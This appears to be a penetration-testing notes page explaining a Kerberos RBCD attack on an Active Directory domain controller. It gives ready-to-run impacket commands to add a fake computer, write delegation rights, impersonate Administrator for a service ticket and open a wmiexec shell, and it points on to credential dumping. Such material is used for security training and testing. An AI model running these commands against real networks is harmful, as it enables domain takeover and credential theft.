# RBCD (Resource-Based Constrained Delegation) Attack

Kerberos RBCD attack targets a domain computer, exactly service principals related to the target domain computer.

### Exploit <a href="#exploit" id="exploit"></a>

Reference: <https://github.com/tothi/rbcd-attack#abusing-kerberos-resource-based-constrained-delegation>

#### 0. Prerequisites <a href="#id-0-prerequisites" id="id-0-prerequisites"></a>

To achieve this attack successfully, we need the following conditions:

* A domain account who has permission to write the computer (`msDS-AllowedToActOnBehalfOfOtherIdentity` property of the domain object).
* A domain account who has permission to create a new computer.
* LDAP (389) and SAMR (445) or LDAPS (636) access to the DC.
* Kerberos (88) access to the DC.

#### 1. Create Fake Computer <a href="#id-1-create-fake-computer" id="id-1-create-fake-computer"></a>

```
impacket-addcomputer -computer-name 'FAKECOMPUTER$' -computer-pass 'password123' -dc-ip 10.0.0.1 'example.local/username:password'
```

#### 2. Modify Delegation Rights <a href="#id-2-modify-delegation-rights" id="id-2-modify-delegation-rights"></a>

We can use [rbcd.py](https://github.com/tothi/rbcd-attack#abusing-kerberos-resource-based-constrained-delegation) for abusing `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the target.

```
impacket-rbcd -delegate-from 'FAKECOMPUTER$' -delegate-to 'DC$' -dc-ip 10.0.0.1 -action 'write' 'example.local/username:password'
```

#### 3. Get the Impersonated Service Ticket <a href="#id-3-get-the-impersonated-service-ticket" id="id-3-get-the-impersonated-service-ticket"></a>

Impersonated service tickets may allow high-level access to services on the target like CIFS (Common Internet File System), HTTPs, etc.

```
impacket-getST -spn 'cifs/dc.example.local' -impersonate Administrator -dc-ip 10.0.0.1 'example.local/FAKECOMPUTER$:password123'
# or
impacket-getST -spn 'ldap/dc.example.local' -impersonate Administrator -dc-ip 10.0.0.1 'example.local/FAKECOMPUTER$:password123'
```

#### 4. Use the Service Ticket <a href="#id-4-use-the-service-ticket" id="id-4-use-the-service-ticket"></a>

After getting the service ticket, we can use it for further pentesting.\
Before doing that, we need to add the environment variable as below:

```
export KRB5CCNAME=`pwd`/admin.ccache

# Check by listing tickets.
# If the klist command not found, install it by `apt install krb5-user`
klist
```

* Login to Services with Kerberos Auth

  ```
  # -k: Use Kerberos Auth
  # -no-pass: No password
  impacket-wmiexec example.local/Administrator@example.local -k -no-pass
  ```
* Dump credentials

  See [Dumping Windows Password Hashes](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/dumping-windows-password-hashes/)

### References <a href="#references" id="references"></a>

* [tothi](https://github.com/tothi/rbcd-attack)